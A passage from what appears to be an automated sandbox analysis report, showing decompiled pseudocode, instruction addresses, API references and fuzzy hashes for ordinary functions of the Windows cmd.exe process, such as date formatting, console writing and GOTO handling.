								_t177 =  *(_t176 + 0xc);
								_v1112 = _t135;
								_v1100 = _t177;
								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
									goto L15;
								}
								L4:
								_t206 =  *_t177;
								_t192 = _t206;
								_v1104 = _t206;
								_t178 = _t192 + 2;
								do {
									_t136 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t136 != _t196);
								_t191 = _t192 - _t178 >> 1;
								_t137 = E00D93121(_t206, _t192 - _t178 >> 1);
								_v1094 = _t137;
								if(_t137 != 0) {
									L8:
									_v1100[2] = _t137;
									if( *((char*)(_t154 + 8)) != 0) {
										_t191 = _t137;
										_t206 = E00D94DB8(_t206, _t137);
										E00D90040(_v1104);
									}
									_t156 = _t206;
									 *0xdc3cf0 = _t196;
									_t138 = E00D93B5D(_t206, _t191);
									_v1120 = _t138;
									if(_t138 != 1) {
										_t165 =  *0xdc3cb8;
										if( *0xdc3cb8 == 0) {
											goto L48;
										}
										goto L17;
									} else {
										if(_v1093 == 0) {
											goto L14;
										}
										_push(_t196);
										_push( *0xdc3cf0);
										goto L13;
									}
								}
								_t156 =  *0xdc3cf0;
								if(_t156 != 0) {
									if(_v1093 == 0) {
										goto L14;
									}
									_push(_t196);
									_push(_t156);
									goto L13;
								}
								goto L8;
							}
						}
						_t146 =  *((intOrPtr*)(_t203 + 0x14));
						if(_t146 == 0 ||  *_t146 == _t196) {
							_t186 = _v36;
							if(_t186 == 0) {
								_t186 =  &_v556;
							}
							_t191 = _t186 + 2;
							do {
								_t147 =  *_t186;
								_t186 = _t186 + 2;
							} while (_t147 != _t196);
							_t148 = (_t186 - _t191 >> 1) + 3;
							if(_v1094 != 0) {
								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
									E00D90CF2(_t191, L".*");
								}
							}
						}
						goto L33;
					}
					if(_v1094 != 0) {
						_t190 = _t202;
						if(_t202 == 0) {
							_t190 =  &_v1092;
						}
						if( *((short*)(E00D85846(_t190))) != 0x2e) {
							_t156 = _v1104;
							goto L22;
						} else {
							if(_t202 == 0) {
								_t202 =  &_v1092;
							}
							_t156 = _v1104;
							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
							goto L24;
						}
					}
					L22:
					if(_t202 == 0) {
						_t202 =  &_v1092;
					}
					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
					goto L24;
				}
				_t153 = _v1116;
				 *_t200 = _t164;
				_t191 = 1;
				 *_t164 = 0;
				 *((intOrPtr*)(_t164 + 4)) = 0;
				 *((intOrPtr*)(_t164 + 8)) = 1;
				_t177 = _t153 + 0x4c;
				_v1112 = 1;
				_v1100 = _t177;
				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
					goto L15;
				}
				goto L4;
			}

0x00d94800
0x00d94803
0x00d94805
0x00d94806
0x00d94811
0x00d94815
0x00d9481d
0x00d94824
0x00d94828
0x00d94832
0x00d94834
0x00d94840
0x00d94848
0x00d9484e
0x00d94854
0x00d9485a
0x00d94861
0x00d94869
0x00d94871
0x00d94875
0x00d94881
0x00d94889
0x00d9489b
0x00d9ea9e
0x00d9eaa5
0x00d9498b
0x00d9498d
0x00d9498e
0x00d94991
0x00d9499e
0x00d949aa
0x00d949ad
0x00d949b9
0x00d949b9
0x00d9eaab
0x00d9eaac
0x00d94984
0x00d94984
0x00000000
0x00d9498a
0x00d948a6
0x00d948b3
0x00000000
0x00000000
0x00d948bb
0x00d948c1
0x00d948c3
0x00d948cb
0x00d9e940
0x00d9e940
0x00d9e94c
0x00d9e952
0x00d9e952
0x00d949ca
0x00d949d1
0x00d949d6
0x00d949db
0x00d949e1
0x00d949e5
0x00d9e95c
0x00d9e95c
0x00d949eb
0x00d949ee
0x00d949ee
0x00d949f1
0x00d949f4
0x00d949fb
0x00d949fd
0x00d94a06
0x00d94a24
0x00d94a2c
0x00d9ea90
0x00000000
0x00000000
0x00d9ea96
0x00d9ea97
0x00000000
0x00d9ea97
0x00d94a32
0x00d94a38
0x00d94a3e
0x00d9e9b0
0x00d9e9b0
0x00d94a4b
0x00d94a50
0x00d94a55
0x00d9e9ba
0x00d9e9ba
0x00d94a5b
0x00d94a5e
0x00d94a5e
0x00d94a61
0x00d94a64
0x00d94a71
0x00d94a7b
0x00d9ea7b
0x00000000
0x00000000
0x00d9ea81
0x00d9ea82
0x00000000
0x00d9ea82
0x00d94a87
0x00d94a9d
0x00d94a9d
0x00d94aa2
0x00d9e9ef
0x00d9e9ef
0x00d94aa8
0x00d94aad
0x00d94ab3
0x00d94ab5
0x00d94abd
0x00d94b53
0x00d94b53
0x00d94ac3
0x00d94ac8
0x00d94acb
0x00d94ad4
0x00d9e9fe
0x00d9ea08
0x00d9ea52
0x00d9ea55
0x00000000
0x00d9ea55
0x00d9ea0c
0x00d9ea12
0x00d9ea16
0x00000000
0x00000000
0x00d9ea28
0x00d9ea2e
0x00d9ea33
0x00d9ea38
0x00d9ea3e
0x00d9ea41
0x00d9ea43
0x00d9ea46
0x00000000
0x00d94ada
0x00d94adc
0x00d94ae1
0x00d94ae7
0x00d94aea
0x00d94aed
0x00d94aed
0x00d94af0
0x00d94af3
0x00d94af9
0x00d94aff
0x00d94b00
0x00d94b03
0x00d94b09
0x00d94b12
0x00000000
0x00000000
0x00d948fc
0x00d948fc
0x00d948fe
0x00d94900
0x00d94906
0x00d94909
0x00d94909
0x00d9490c
0x00d9490f
0x00d94918
0x00d9491a
0x00d9491f
0x00d94927
0x00d94937
0x00d94941
0x00d94944
0x00d94946
0x00d94955
0x00d94957
0x00d94957
0x00d9495c
0x00d9495e
0x00d94964
0x00d94969
0x00d94972
0x00d949bc
0x00d949c4
0x00000000
0x00000000
0x00000000
0x00d94974
0x00d9497b
0x00000000
0x00000000
0x00d9497d
0x00d9497e
0x00000000
0x00d9497e
0x00d94972
0x00d94929
0x00d94931
0x00d9ea67
0x00000000
0x00000000
0x00d9ea6d
0x00d9ea6e
0x00000000
0x00d9ea6e
0x00000000
0x00d94931
0x00d94ad4
0x00d94a89
0x00d94a8e
0x00d94b1d
0x00d94b22
0x00d94b4b
0x00d94b4b
0x00d94b24
0x00d94b27
0x00d94b27
0x00d94b2a
0x00d94b2d
0x00d94b3d
0x00d94b40
0x00d9e9ca
0x00d9e9e5
0x00d9e9e5
0x00d9e9ca
0x00d94b40
0x00000000
0x00d94a8e
0x00d94a0f
0x00d9e967
0x00d9e96b
0x00d9e96d
0x00d9e96d
0x00d9e97c
0x00d9e99a
0x00000000
0x00d9e97e
0x00d9e980
0x00d9e982
0x00d9e982
0x00d9e988
0x00d9e990
0x00000000
0x00d9e990
0x00d9e97c
0x00d94a15
0x00d94a17
0x00d9e9a5
0x00d9e9a5
0x00d94a1f
0x00000000
0x00d94a1f
0x00d948d1
0x00d948d9
0x00d948db
0x00d948dc
0x00d948de
0x00d948e1
0x00d948e4
0x00d948e7
0x00d948ed
0x00d948f6
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00D94861
memset.MSVCRT ref: 00D94881

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

??_V@YAXPAX@Z.MSVCRT ref: 00D94991
??_V@YAXPAX@Z.MSVCRT ref: 00D9499E
longjmp.MSVCRT(00DBB8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00D9E94C

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$Heap$AllocProcesslongjmp
String ID:
API String ID: 2656838167-0
Opcode ID: 3a9cb1259ec3152222e1a3ba93a767a671e150a0df2f3685099d4027f66f2e3e
Instruction ID: dbcf641387b6967a5c5ed8e138e4a0161205624c6646b9f7236f279c70fc035e
Opcode Fuzzy Hash: 3a9cb1259ec3152222e1a3ba93a767a671e150a0df2f3685099d4027f66f2e3e
Instruction Fuzzy Hash: 8DD1C1709002159BCF38DF14C891BAAB7B4EF44704F5840DDE94AA7292DB71AE82CF79

Uniqueness

Uniqueness Score: -1.00%

Function 00D8B6CB, Relevance: 9.2, APIs: 6, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D8B6CB(void** __ecx, intOrPtr _a8) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				void** _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t96;
				void* _t97;
				void* _t103;
				intOrPtr _t114;
				void* _t115;
				void** _t121;
				void** _t122;
				void* _t125;
				void* _t126;
				void* _t135;
				void* _t136;
				signed short _t143;
				long _t153;
				short* _t155;
				void* _t161;
				signed int _t164;
				void* _t168;
				void _t170;
				void _t174;
				intOrPtr _t184;
				void* _t187;
				void* _t192;
				void** _t193;
				signed int _t195;
				signed int _t204;
				int _t207;
				void** _t215;
				void** _t216;
				signed int _t224;
				signed int _t228;
				void* _t229;
				void* _t232;
				void* _t238;
				void* _t240;
				intOrPtr _t248;
				signed int _t253;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;

				_t193 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t97 = E00D9269C(_t96);
					_t260 =  *(__ecx + 0x10);
					if(_t97 == 0) {
						if(E00D927C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
							goto L59;
						} else {
							_t179 =  *(__ecx + 8);
							_t101 =  *(__ecx + 8) + _t179;
							if(_v20 >=  *(__ecx + 8) + _t179) {
								goto L35;
							} else {
								goto L59;
							}
						}
					} else {
						_t184 = _t260 +  *(__ecx + 8) * 2;
						_v12 = _t184;
						if(_t260 < _t184) {
							_t238 = 0x2022;
							while(1) {
								_t259 = _t260;
								if(_t260 >= _t184) {
									goto L35;
								}
								while( *_t259 != _t238) {
									_t259 = _t259 + 2;
									if(_t259 < _t184) {
										continue;
									}
									break;
								}
								if(_t259 == _t260) {
									goto L48;
								} else {
									_t192 = _t259 - _t260 >> 1;
									_v16 = _t192;
									__imp___get_osfhandle(0);
									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
										L59:
										_t202 = 1;
										if(E00D90178(_t101) == 0) {
											_t202 = 1;
											_t103 = E00DA9953(_t102, 1);
											if(_t103 == 0) {
												_push(_t103);
												_push(0x70);
												goto L63;
											}
										} else {
											_push(0);
											_push(0x1d);
											L63:
											E00D8C5A2(_t202);
											_pop(_t202);
										}
										E00DA9287(_t202);
										__imp__longjmp(0xdbb8b8, 1);
										asm("int3");
										_t204 = 9;
										memcpy( &_v420, _t260, _t204 << 2);
										_t266 = _t266 + 0xc;
										E00DA3C49( &_v420,  &_v376);
										FileTimeToLocalFileTime( &_v376,  &_v384);
										FileTimeToSystemTime( &_v384,  &_v348);
										_v352 = 0;
										if( *0xdc3cc9 == 0) {
											_t245 = _v348 & 0x0000ffff;
											_t261 = _v346 & 0x0000ffff;
											_t258 = _v342 & 0x0000ffff;
											_v352 = _t245;
											if(_v364 == 0) {
												_t224 = 0x64;
												_t245 = _t245 % _t224;
												_v352 = _t245;
											}
											_t114 =  *0xdad540; // 0x0
											if(_t114 != 2) {
												if(_t114 == 1) {
													_t135 = _t261;
													_t261 = _t258;
													_t258 = _t135;
												}
											} else {
												_t136 = _t245;
												_t245 = _t258;
												_t258 = _t261;
												_v352 = _t245;
												_t261 = _t136;
											}
											_t207 =  *0xdad598; // 0x0
											if(_t207 >= 0x20) {
												_t115 =  *0xdad594; // 0x0
												goto L92;
											} else {
												_t115 = realloc( *0xdad594, 0x40);
												_pop(0);
												if(_t115 != 0) {
													_t245 = _v352;
													_t207 = 0x20;
													 *0xdad594 = _t115;
													 *0xdad598 = _t207;
													L92:
													_push(_t245);
													_push(0xdaf80c);
													_push(_t258);
													_push(0xdaf80c);
													E00D9274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
													_t266 = _t266 + 0x20;
													_t258 = 2;
													goto L34;
												} else {
													_push(_t115);
													goto L79;
												}
											}
										} else {
											_v356 = 0;
											if(GetLocaleInfoW(E00D941A4(), 0x1f,  &_v332, 0x80) == 0) {
												_t245 = 0x80;
												E00D91040( &_v332, 0x80,  *0xdaf7f8);
											}
											_t143 = _v332;
											_t263 =  &_v332;
											_t258 = 2;
											if(_t143 != 0) {
												_t195 = _v356;
												_t228 = _t143 & 0x0000ffff;
												_t161 = 0x64;
												do {
													if(_t228 == 0x27) {
														_t263 = _t263 + _t258;
														_t195 = 0 | _t195 == 0x00000000;
													} else {
														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
															_t263 = _t263 + _t258;
														} else {
															_t253 = 0;
															do {
																_t263 = _t263 + _t258;
																_t253 = 1 + _t253;
															} while ( *_t263 == _t228);
															_v356 = _t263;
															_t264 = _t263 +  ~_t253 * 2;
															if(_t253 != 1) {
																_t168 = 0x64;
																if(_t228 == _t168) {
																	_v360 = 0;
																}
																if(_t253 <= 3) {
																	_t263 = _v356;
																} else {
																	_t245 = _v356;
																	_t229 = _t245;
																	_v356 = _t229 + 2;
																	do {
																		_t170 =  *_t229;
																		_t229 = _t229 + _t258;
																	} while (_t170 != _v352);
																	_t263 = _t264 + 6;
																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
																	_t266 = _t266 + 0xc;
																}
															} else {
																_t232 = _t264;
																_t245 = _t232 + 2;
																do {
																	_t174 =  *_t232;
																	_t232 = _t232 + _t258;
																} while (_t174 != _v352);
																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
																_t266 = _t266 + 0xc;
																_t263 = _t264 + 4;
															}
														}
													}
													_t164 =  *_t263 & 0x0000ffff;
													_t228 = _t164;
													_t161 = 0x64;
												} while (_t164 != 0);
												_t193 = _v368;
											}
											if(GetDateFormatW(E00D941A4(), 0,  &_v348,  &_v332,  *0xdad594,  *0xdad598) == 0) {
												L31:
												_t261 = GetDateFormatW(E00D941A4(), 0,  &_v348,  &_v332, 0, 0);
												if(_t261 == 0) {
													_t153 = GetLastError();
													_push(0);
													goto L77;
												} else {
													_t261 = _t261 + 1;
													_t155 = realloc( *0xdad594, _t261 + _t261);
													_pop(0);
													if(_t155 == 0) {
														_push(0);
														L79:
														_push(8);
														goto L80;
													} else {
														 *0xdad594 = _t155;
														 *0xdad598 = _t261;
														_t261 = 0;
														if(GetDateFormatW(E00D941A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
															_t153 = GetLastError();
															_push(0);
															L77:
															 *0xdc3cf0 = _t153;
															_push(_t153);
															L80:
															E00D8C5A2(0);
															_t122 = 0;
														} else {
															L34:
															_t261 =  *0xdad594; // 0x0
															goto L14;
														}
													}
												}
											} else {
												_t261 =  *0xdad594; // 0x0
												if(_t261 == 0) {
													goto L31;
												} else {
													L14:
													_push(E00D85AA7(_v344 & 0x0000ffff));
													_t245 = 0x20;
													E00D91040( &_v76, _t245);
													if(_t193 == 0) {
														if(_v360 != 0) {
															if(E00D868B5() == 0) {
																_push(_t261);
																_push( &_v76);
															} else {
																_push( &_v76);
																_push(_t261);
															}
															_t121 = E00D925D9(L"%s %s ");
														} else {
															_push(_t261);
															_t121 = E00D925D9(L"%s ");
														}
														_t193 = _t121;
													} else {
														if(_v360 == 0 || _v364 != 1) {
															E00D91040(_t193, _a8, _t261);
														} else {
															_t126 = E00D868B5();
															_t248 = _a8;
															_t216 = _t193;
															if(_t126 != 0) {
																E00D91040(_t216, _t248, _t261);
																E00D918C0(_t193, _a8, " ");
																_push( &_v76);
															} else {
																E00D91040(_t216, _t248,  &_v76);
																E00D918C0(_t193, _a8, " ");
																_push(_t261);
															}
															E00D918C0(_t193, _a8);
														}
														_t215 =  &(_t193[0]);
														_t245 = 0;
														do {
															_t125 =  *_t193;
															_t193 = _t193 + _t258;
														} while (_t125 != 0);
														_t193 = _t193 - _t215 >> 1;
													}
													_t122 = _t193;
												}
											}
										}
										return E00D96FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
									} else {
										_t101 = _v16;
										if(_v8 != _v16) {
											goto L59;
										} else {
											_t184 = _v12;
											_t260 = _t259;
											_t238 = 0x2022;
											L48:
											while(_t259 < _t184) {
												if( *_t259 == _t238) {
													_t259 = _t259 + 2;
													continue;
												}
												break;
											}
											if(_t259 == _t260) {
												L55:
												_t238 = 0x2022;
												if(_t260 < _t184) {
													continue;
												} else {
													goto L35;
												}
											} else {
												if( *_t193 != 0) {
													SetConsoleMode( *_t193, 2);
												}
												_t187 = _t259 - _t260 >> 1;
												_v16 = _t187;
												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
												_t240 = 1;
												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
												_t101 = E00D906C0(_t240);
												if(_t260 == 0) {
													goto L59;
												} else {
													_t101 = _v16;
													if(_v8 != _v16) {
														goto L59;
													} else {
														_t184 = _v12;
														_t260 = _t259;
														goto L55;
													}
												}
											}
										}
									}
								}
								goto L102;
							}
						}
						goto L35;
					}
				} else {
					L35:
					_t193[1] = _t193[1] + E00D8BED7(_t193, _t193[4]);
					 *(_t193[4]) = 0;
					_t193[2] = _t193[2] & 0;
					return 0;
				}
				L102:
			}

0x00d8b6d4
0x00d8b6dc
0x00d99996
0x00d9999b
0x00d999a0
0x00d99a97
0x00000000
0x00d99a99
0x00d99a99
0x00d99a9c
0x00d99aa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00d99aa1
0x00d999a6
0x00d999a9
0x00d999ac
0x00d999b1
0x00d999b7
0x00d999bc
0x00d999bc
0x00d999c0
0x00000000
0x00000000
0x00d999c6
0x00d999cb
0x00d999d0
0x00000000
0x00000000
0x00000000
0x00d999d0
0x00d999d4
0x00000000
0x00d999d6
0x00d999e0
0x00d999e6
0x00d999e9
0x00d999f9
0x00d99aa7
0x00d99aa9
0x00d99ab1
0x00d99abb
0x00d99abc
0x00d99ac3
0x00d99ac5
0x00d99ac6
0x00000000
0x00d99ac6
0x00d99ab3
0x00d99ab3
0x00d99ab5
0x00d99ac8
0x00d99ac8
0x00d99ace
0x00d99ace
0x00d99acf
0x00d99adb
0x00d99ae1
0x00d99ae4
0x00d99aeb
0x00d99aeb
0x00d99af9
0x00d85b59
0x00d85b6d
0x00d85b75
0x00d85b81
0x00d99bba
0x00d99bc1
0x00d99bc8
0x00d99bcf
0x00d99bdb
0x00d99be3
0x00d99be4
0x00d99be6
0x00d99be6
0x00d99bec
0x00d99bf4
0x00d99c09
0x00d99c0b
0x00d99c0d
0x00d99c0f
0x00d99c0f
0x00d99bf6
0x00d99bf6
0x00d99bf8
0x00d99bfa
0x00d99bfc
0x00d99c02
0x00d99c02
0x00d99c11
0x00d99c1a
0x00d99c4c
0x00000000
0x00d99c1c
0x00d99c24
0x00d99c2b
0x00d99c2e
0x00d99c36
0x00d99c3e
0x00d99c3f
0x00d99c44
0x00d99c51
0x00d99c51
0x00d99c57
0x00d99c58
0x00d99c59
0x00d99c62
0x00d99c67
0x00d99c6c
0x00000000
0x00d99c30
0x00d99c30
0x00000000
0x00d99c30
0x00d99c2e
0x00d85b87
0x00d85b87
0x00d85baa
0x00d99b09
0x00d99b11
0x00d99b11
0x00d85bb0
0x00d85bb7
0x00d85bbf
0x00d85bc3
0x00d85bc5
0x00d85bcd
0x00d85bd0
0x00d85bd1
0x00d85bd5
0x00d99b1d
0x00d99b24
0x00d85bdb
0x00d85bdd
0x00d85bf2
0x00d85cdd
0x00d85cdf
0x00d85ce1
0x00d85ce1
0x00d85ce3
0x00d85ce4
0x00d85ceb
0x00d85cf3
0x00d85cf9
0x00d99b2d
0x00d99b31
0x00d99b35
0x00d99b35
0x00d99b3e
0x00d99b82
0x00d99b40
0x00d99b40
0x00d99b46
0x00d99b4b
0x00d99b51
0x00d99b51
0x00d99b54
0x00d99b56
0x00d99b65
0x00d99b74
0x00d99b7a
0x00d99b7a
0x00d85cff
0x00d85cff
0x00d85d01
0x00d85d04
0x00d85d04
0x00d85d07
0x00d85d09
0x00d85d23
0x00d85d29
0x00d85d2c
0x00d85d2c
0x00d85cf9
0x00d85bdd
0x00d85bf4
0x00d85bf9
0x00d85bfe
0x00d85bfe
0x00d85c01
0x00d85c01
0x00d85c32
0x00d85d34
0x00d85d53
0x00d85d57
0x00d99b8d
0x00d99b95
0x00000000
0x00d85d5d
0x00d85d5d
0x00d85d68
0x00d85d6f
0x00d85d72
0x00d99ba9
0x00d99baa
0x00d99baa
0x00000000
0x00d85d78
0x00d85d7a
0x00d85d8c
0x00d85d93
0x00d85da4
0x00d99b98
0x00d99b9e
0x00d99b9f
0x00d99b9f
0x00d99ba4
0x00d99bac
0x00d99bac
0x00d99bb3
0x00d85daa
0x00d85daa
0x00d85daa
0x00000000
0x00d85daa
0x00d85da4
0x00d85d72
0x00d85c38
0x00d85c38
0x00d85c40
0x00000000
0x00d85c46
0x00d85c46
0x00d85c52
0x00d85c55
0x00d85c59
0x00d85c60
0x00d99c79
0x00d99c94
0x00d99c9a
0x00d99c9b
0x00d99c96
0x00d99c96
0x00d99c97
0x00d99c97
0x00d99ca1
0x00d99c7b
0x00d99c7b
0x00d99c81
0x00d99c87
0x00d99ca9
0x00d85c66
0x00d85c6d
0x00d99cd4
0x00d85c80
0x00d85c80
0x00d85c85
0x00d85c88
0x00d85c8c
0x00d99cb1
0x00d99cc0
0x00d99cc8
0x00d85c92
0x00d85c96
0x00d85ca5
0x00d85caa
0x00d85caa
0x00d85cb0
0x00d85cb0
0x00d85cb5
0x00d85cb8
0x00d85cba
0x00d85cba
0x00d85cbd
0x00d85cbf
0x00d85cc6
0x00d85cc6
0x00d85cc8
0x00d85cc8
0x00d85c40
0x00d85c32
0x00d85cda
0x00d999ff
0x00d999ff
0x00d99a05
0x00000000
0x00d99a0b
0x00d99a0b
0x00d99a0e
0x00d99a10
0x00000000
0x00d99a1f
0x00d99a1a
0x00d99a1c
0x00000000
0x00d99a1c
0x00000000
0x00d99a1a
0x00d99a25
0x00d99a6f
0x00d99a6f
0x00d99a76
0x00000000
0x00d99a7c
0x00000000
0x00d99a7c
0x00d99a27
0x00d99a2a
0x00d99a30
0x00d99a30
0x00d99a40
0x00d99a46
0x00d99a49
0x00d99a4f
0x00d99a57
0x00d99a59
0x00d99a60
0x00000000
0x00d99a62
0x00d99a62
0x00d99a68
0x00000000
0x00d99a6a
0x00d99a6a
0x00d99a6d
0x00000000
0x00d99a6d
0x00d99a68
0x00d99a60
0x00d99a25
0x00d99a05
0x00d999f9
0x00000000
0x00d999d4
0x00d999bc
0x00000000
0x00d999b1
0x00d8b6e2
0x00d8b6e2
0x00d8b6ec
0x00d8b6f6
0x00d8b6f9
0x00d8b702
0x00d8b702
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 00D999E9
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00D999F1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 00D99A30
_get_osfhandle.MSVCRT ref: 00D99A49
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00D99A51

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console$Write_get_osfhandle$Mode
String ID:
API String ID: 1066134489-0
Opcode ID: 991ff8ff4fcafae7d0fee4f65e367a8d7a4df08fe08f3c798db860cf86021acb
Instruction ID: 43dcdae6cd519d323b41ca6aaecb1ad89ae16ea128fe80f6263e52953e1ee156
Opcode Fuzzy Hash: 991ff8ff4fcafae7d0fee4f65e367a8d7a4df08fe08f3c798db860cf86021acb
Instruction Fuzzy Hash: 6B41A631A00311ABDF24AE7CD85ABAEF7A9EB40315F18446EE906DB181EB70DD40CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D8E5A8, Relevance: 9.1, APIs: 6, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00D8E5A8(struct HINSTANCE__** __ebx, struct HINSTANCE__* __edx, intOrPtr __edi, void* __ebp, void* _a4, intOrPtr _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16, struct HINSTANCE__* _a20, struct HINSTANCE__* _a24, struct HINSTANCE__* _a28, void _a32, void* _a536, intOrPtr _a544, void* _a548, int _a552, char _a556, int _a560, signed int _a572) {
				void* _v0;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t64;
				struct HINSTANCE__ _t66;
				int _t69;
				int _t74;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t83;
				struct HINSTANCE__* _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				struct HINSTANCE__* _t87;
				struct HINSTANCE__* _t88;
				struct HINSTANCE__* _t100;
				struct HINSTANCE__** _t102;
				void* _t103;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__ _t114;
				intOrPtr _t132;
				struct HINSTANCE__* _t133;
				void* _t134;
				void* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				signed int _t140;
				void* _t142;

				_t132 = __edi;
				_t126 = __edx;
				_t102 = __ebx;
				goto L1;
				L33:
				__eflags =  *((short*)( *((intOrPtr*)(_t126 + 0x38)))) - 0x3a;
				if( *((short*)( *((intOrPtr*)(_t126 + 0x38)))) != 0x3a) {
					goto L4;
				}
				_t136 = E00D900B0(0x50);
				__eflags = _t136;
				if(_t136 == 0) {
					L73:
					_t57 = 1;
					L32:
					_pop(_t134);
					_pop(_t135);
					_pop(_t103);
					__eflags = _a572 ^ _t140;
					return E00D96FD0(_t57, _t103, _a572 ^ _t140, _t126, _t134, _t135);
				}
				_t136->i = 0;
				_t63 = E00D8DF40(L"GOTO");
				 *(_t136 + 0x38) = _t63;
				__eflags = _t63;
				if(_t63 == 0) {
					goto L73;
				}
				_t64 = E00D8DF40( *((intOrPtr*)(_a24 + 0x38)));
				 *(_t136 + 0x3c) = _t64;
				__eflags = _t64;
				if(_t64 == 0) {
					goto L73;
				}
				_t126 = 1;
				_t64->i = 0x20;
				 *(_t136 + 0x40) = 0;
				_a28 = 1;
				L13:
				if(_t132 != 0) {
					__eflags = _t136;
					if(_t136 != 0) {
						_a20 = 0;
					}
				}
				_t114 = _t136->i;
				if(_t114 != 0 ||  *( *(_t136 + 0x38)) != 0x3a) {
					if(_t126 != 0) {
						_a28 = 0;
						_t66 = _t114;
					} else {
						_t66 = _t114;
						if( *0xdad0c8 == 1) {
							_t66 = _t114;
							__eflags = _t114 - 0x3b;
							if(_t114 != 0x3b) {
								__eflags =  *0xdc8530;
								_t66 = _t114;
								if( *0xdc8530 == 0) {
									E00DA6FF0(_t114);
									_t126 = 0;
									E00DA2ED0(_t136, 0);
									E00D925D9(L"\r\n");
									_t66 = _t136->i;
									_t140 = _t140 + 4;
								}
							}
						}
					}
					if(_t66 == 0x3b) {
						_t136 =  *(_t136 + 0x38);
					}
					_a552 = 0;
					_a556 = 1;
					_a560 = 0x104;
					memset( &_a32, 0, 0x104);
					_t140 = _t140 + 0xc;
					if(_a556 == 0) {
						_t69 = 0x104;
					} else {
						_t69 = 0x7fe7;
					}
					if(E00D90C70( &_a32, _t69) < 0) {
						E00D90DE8(_t70,  &_a32);
						goto L73;
					} else {
						if(_t136 == 0) {
							_t136 = 0;
							_a16 = 0;
							L28:
							__imp__??_V@YAXPAX@Z(_a552);
							_t140 = _t140 + 4;
							goto L29;
						}
						if( *_t136 != 0 || E00D8DFC0(0x2a,  *(_t136 + 0x38),  &_a16) != 0xffffffff) {
							L25:
							_t126 = _t136;
							_a16 = E00D90E00(2, _t136);
							E00D906C0(2);
							_t74 = GetConsoleOutputCP();
							 *0xdb3854 = _t74;
							GetCPInfo(_t74, 0xdb3840);
							_t137 =  *0xdad5f8; // 0x0
							if(_t137 == 0) {
								_t76 =  *0xdad0d0; // 0xffffffff
								__eflags = _t76 - 0xffffffff;
								if(_t76 != 0xffffffff) {
									L67:
									__eflags = _t76;
									if(_t76 != 0) {
										_t137 = GetProcAddress(_t76, "SetThreadUILanguage");
										 *0xdad5f8 = _t137;
									}
									L69:
									__eflags = _t137;
									if(_t137 != 0) {
